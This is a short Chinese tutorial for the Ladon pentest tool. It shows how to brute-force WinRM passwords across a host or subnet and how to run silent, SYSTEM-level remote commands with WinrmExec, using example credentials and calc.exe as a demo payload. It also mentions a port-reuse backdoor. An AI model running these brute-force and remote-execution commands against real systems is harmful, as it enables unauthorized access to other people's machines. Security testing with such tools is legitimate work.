〖教程〗Ladon WinrmExec远程执行命令
版本
>= Ladon 7.3.0
Update: 20200901
WinrmScan 5985密码爆破
Ladon 192.168.1.8 WinrmScan
Ladon 192.168.1.8/24 WinrmScan
WinrmExec 远程执行命令
1.无回显
2.支持SYSTEM权限
Usage:
Ladon WinrmExec <Target> [Port] [Domain] [Username] [Password] <Command>
Default Port is 5985
Example:
Ladon WinrmExec 192.168.1.116 . k8gege K8test520!@# calc.exe
Ladon WinrmExec 192.168.1.116 80 . k8gege K8test520!@# calc.exe
Ladon WinrmExec 192.168.1.116 5985 . k8gege K8test520!@# calc.exe
Winrm密码爆破/端口复用后门
相关知识点请参考:http://k8gege.org/Ladon/WinrmScan.html
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dMuKhMB5-1600265570404)(http://k8gege.org/k8img/Ladon/exe/WinrmExec_Scan.PNG)]